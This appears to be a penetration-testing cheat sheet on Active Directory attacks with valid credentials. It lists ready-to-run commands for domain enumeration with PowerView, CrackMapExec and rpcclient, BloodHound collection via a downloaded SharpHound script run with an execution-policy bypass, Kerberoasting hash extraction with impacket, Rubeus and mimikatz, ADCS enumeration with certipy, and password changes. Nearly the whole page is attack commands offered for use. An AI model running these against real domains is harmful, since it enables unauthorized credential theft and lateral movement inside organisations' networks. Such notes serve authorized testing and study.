# Valid Credentials ## Enumeration ### Using Windows Legacy Tools ``` net user /domain net user /domain net group /domain net group "" /domain ``` ### PowerView **Get Domain Information** ``` Get-NetDomain ``` **Get User List** ``` Get-NetUser ``` **Get a specific User** ``` Get-NetUser "user" ``` **Enumerate Password Change && Last Login** ``` Get-NetUser | select cn,pwdlastset,lastlogon ``` **Get Groups** ``` Get-NetGroup ``` **Get a specific Group** ``` Get-NetGroup "Domain Admins" ``` **Get Members of groups** ``` Get-NetGroup "Domain Admins" | select member ``` **List Domain Shares** ``` Find-DomainShare ``` **Get Computer Objects** ``` Get-NetComputer Get-NetComputer | select operatingsystem,dnshostname ``` **Check if we are ADMIN on other Computers** ``` Find-LocalAdminAcess ``` **Check for Logged Users** ``` Get-NetSession -ComputerName files04 -Verbose .\PsLoggedon.exe ``` **Enumerate ACL** ``` Get-ObjectAcl -Identity "user" ``` In order to make sense of the SID, we can use PowerView's **Convert-SidToName** command to convert it to an actual domain object name: ``` Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104 "S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName ``` **Enumerate GenericAll in the domain** ``` Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights ``` **Enumerate SPN** ``` Get-NetUser -SPN | select samaccountname,serviceprincipalname ``` ### Service Principal Name (SPN) Enumeration ``` setspn -L iis_service nslookup.exe ``` ## Get all the users {% tabs %} {% tab title="GetADUsers" %} ``` GetADUsers.py -all -dc-ip / ``` {% endtab %} {% tab title="cme" %} 
cme smb <ip> -u <user> -p <password> --users

cme smb <ip> -u <user> -p <password> --users | awk '{print $5}' |  grep -v '\[' |  grep -v '-Username-'
{% endtab %} {% tab title="rpcclient" %} ``` rpcclient -U rpcclient > enumdomusers ``` {% endtab %} {% tab title="Windows" %} ``` Get-LocalUser ``` {% endtab %} {% tab title="windpapsearch" %} ``` python3 windapsearch.py --dc-ip DCIP -u user -p password --da ``` {% endtab %} {% endtabs %} ## Enumerate SMB Shares {% tabs %} {% tab title="cme" %} ``` cme smb -u -p --shares ``` {% endtab %} {% endtabs %} ## BloodHound {% tabs %} {% tab title="Python" %} ``` bloodhound-python -d -u -p -ns -c all ``` {% endtab %} {% tab title="RustHound" %} ``` ./rusthound -d -u '@' -p -o -z ``` {% endtab %} {% tab title="SharpHound.ps1" %} [SharpHound.ps1](https://raw.githubusercontent.com/RedTeamMagic/Powershell/refs/heads/main/SharpHound.ps1) ``` powershell -ep bypass . .\SharpHound.ps1 Invoke-Bloodhound -collectionmethod all ``` {% endtab %} {% tab title="SharpHound" %} ``` sharphound.exe -c all -d ``` {% endtab %} {% endtabs %} ## Kerberoasting ### Get Kerberoastable users {% tabs %} {% tab title="PowerView" %} ``` Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName-d ``` {% endtab %} {% tab title="BloodHound" %} {% code overflow="wrap" %} ``` MATCH (u:User {hasspn:true}) RETURN u MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p ``` {% endcode %} {% endtab %} {% endtabs %} ### Get Hash {% tabs %} {% tab title="impacket-GetUserSPNs" %} ``` sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 ``` If impacket-GetUserSPNs throws the error "KRB\_AP\_ERR\_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use [*rdate*](https://en.wikipedia.org/wiki/Rdate) to do so. ``` rdate -n [IP of Target] ``` {% endtab %} {% tab title="PowerView" %} {% code overflow="wrap" %} ``` Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation ``` {% endcode %} {% endtab %} {% tab title="Rubeus" %} ``` .\Rubeus.exe kerberoast /outfile:hashes.kerberoast ``` **Find Administrators which are kerberoasteables** ``` .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap ``` {% endtab %} {% tab title="mimikatz" %} ``` mimikatz # base64 /out:true mimikatz # kerberos::list /export ``` {% endtab %} {% endtabs %} #### [hash-cracking](https://m4rcg04m.gitbook.io/m4rcg04m/notes/explotation/password-attacks/hash-cracking "mention") ## ADCS Enumeration {% tabs %} {% tab title="certipy" %} ``` certipy-ad find -username 'user' -password 'password' -dc-ip ``` {% endtab %} {% tab title="netexec" %} ``` netexec ldap domain.lab -u username -p password -M adcs ``` {% endtab %} {% endtabs %} #### [active-directory-certificate-services-ad-cs](https://m4rcg04m.gitbook.io/m4rcg04m/notes/active-directory/active-directory-certificate-services-ad-cs "mention") ## Exploit If we found known vulnerabilities you should exploit them for compromising more systems: [known-vulnerabilities](https://m4rcg04m.gitbook.io/m4rcg04m/notes/active-directory/known-vulnerabilities "mention") ## Connect to computers [lateral-move](https://m4rcg04m.gitbook.io/m4rcg04m/notes/active-directory/lateral-move "mention") ## WinPeas Upload WinPeas for more in depth enumeration ## LDAP ``` ldapsearch -h -D @ -w '' -b "dc=support,dc=htb" "*" ``` ## Change User Password If we got **"STATUS\_PASSWORD\_MUST\_CHANGE"** for some users, we can update a current password to a new one. ``` smbpasswd -r -U ```